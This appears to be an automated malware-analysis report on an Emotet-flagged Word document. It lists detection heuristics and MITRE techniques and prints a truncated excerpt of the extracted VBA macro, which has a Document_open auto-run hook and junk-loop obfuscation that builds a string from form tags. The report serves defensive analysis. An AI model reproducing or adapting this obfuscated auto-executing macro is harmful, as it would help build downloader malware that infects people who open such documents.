MALICIOUS
202
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The file contains VBA macros, specifically a Document_Open macro that is designed to execute automatically. ClamAV identifies this as Emotet, a known downloader family. The macro likely uses GetObject to execute code, aiming to download and run a secondary payload.
Heuristics 6
-
ClamAV: Doc.Downloader.Emotet-7543223-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Emotet-7543223-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
GetObject call high OLE_VBA_GETOBJGetObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 11391 bytes |
SHA-256: 96f1342f3a85a2642cc02aa496a2a5e65ca463d41f0d2bd6e8b2e5ffbb004c16 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "Frjpossu"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
Lvpcgwokshh
End Sub
Attribute VB_Name = "Xhrcwkmbidam"
Attribute VB_Base = "0{385352DE-0D9E-4955-9962-2BCDB0EA3053}{1090BE7C-F755-4A7D-B057-D19E8388E4A1}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "Yokxdhzeadumj"
Function Teupaekd()
Do While Fgqqpushblnf = 900
Do While Kdrfvbettmaj = 3 + 2
Miibxfajx = Chr(4)
Jnitsaprsswrt = Sqr(9) + Plmepgdku
Mirsagei = CLng(Wablkrxppro)
Qpxsxpfcoapn = Int(1 + 1)
Zrqmkyptllseo = CDate(QKoWc)
Ebovqbddnhsh = 9 + Int(4)
Loop
Do While Zmydsyxze = 2 + 4
Cxdmzsbzgjza = CLng(Yvocfsrdlmy)
Vhyfxldn = Int(1 + 4)
Rnorifyzmfmuc = 2 + Int(3)
Ylbymrnfrfrid = Chr(6)
Pduvworaixn = Sqr(7) + Oobfojyzco
Eixlrxuxw = CDate(QKoWc)
Loop
Loop
Uccbmfmc = ChrW(wdKeyP)
Do While Akjooyim = 900
Do While Vhukdghadujn = 3 + 2
Tzxcskghhau = Chr(4)
Fmpmncntcx = Sqr(9) + Gksiftny
Oagtmnoaupqwc = CLng(Hvkyvqbkcma)
Cggpojypguqzf = Int(1 + 1)
Xjjhfuxy = CDate(QKoWc)
Zfmqdhmaoyoib = 9 + Int(4)
Loop
Do While Pzbbuzpnymsc = 2 + 4
Fehdpodlz = CLng(Dzqepoibopv)
Iajsodketsjtg = Int(1 + 4)
Tpezznqzzi = 2 + Int(3)
Kaerkikupelwv = Chr(6)
Khgkjjxiz = Sqr(7) + Wjsakjgfaeoa
Wkwodhehff = CDate(QKoWc)
Loop
Loop
Tvsghavnh = Uccbmfmc + Xhrcwkmbidam.Qwvuacqmitdz + Xhrcwkmbidam.Yhzeupamsvbu
Do While Tzwmczccxhnu = 900
Do While Obrmdzrb = 3 + 2
Homjxyoxux = Chr(4)
Mqvwtniuepybd = Sqr(9) + Kxsasgneontf
Pzdjqpbrgfes = CLng(Sqkgmdea)
Zrymgjahkbppu = Int(1 + 1)
Vtsrmvzijmy = CDate(QKoWc)
Suooxfjyqp = 9 + Int(4)
Loop
Do While Fwixpcvstrklj = 2 + 4
Ajpzhhnp = CLng(Asoioeehuh)
Kujcjtakdfh = Int(1 + 4)
Obpcprhsko = 2 + Int(3)
Kenfdoicj = Chr(6)
Qfxuofiukkya = Sqr(7) + Efpsxafzvzp
Arzazpgzx = CDate(QKoWc)
Loop
Loop
Fack = Xhrcwkmbidam.Diwqqciyfbjs.Tag
Yaiciqbtusvb = Split(Tvsghavnh + LTrim(LTrim(Fack)), "9_msnnj883hn///")
Do While Gtluehttyjwf = 900
Do While Mbsmqkodfl = 3 + 2
Sdkzqdlxht = Chr(4)
Krybdafvmdyib = Sqr(9) + Wfcnzetppjyt
Vfsbtcymmaeg = CLng(Pfcydiprffaur)
Sehlcqyfgh = Int(1 + 1)
Kscjtktzkgapk = CDate(QKoWc)
Znbzlwdu = 9 + Int(4)
Loop
Do While Uriravrsmezcw = 2 + 4
Xcylesbyny = CLng(Izzgygmys)
Kljwxyewq = Int(1 + 4)
Ntfjrettvti = 2 + Int(3)
Tnybwjirmt = Chr(6)
Uwdzibbl = Sqr(7) + Fbopifzopc
Dkadaglw = CDate(QKoWc)
Loop
Loop
Teupaekd = Kituusaycmicc + Join(Yaiciqbtusvb, "") + Kituusaycmicc
Do While Ohorrikgdqkt = 900
Do While Gijraatkedus = 3 + 2
Mmssfaskyob = Chr(4)
Ecyruabajgsw = Sqr(9) + Dclxzcvu
Solbwkvqnioig = CLng(Reodfavozohmq)
Wkkaygpaez = Int(1 + 1)
Jhmvwyyi = CDate(QKoWc)
Qlxwzmmox = 9 + Int(4)
Loop
Do While Cmexgnsbeje = 2 + 4
Lhmtlnssnptzc = CLng(Cnpbfnhvh)
Lfgsxmqylsz = Int(1 + 4)
Jmvpxlyd = 2 + Int(3)
Zrucplemfv = Chr(6)
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.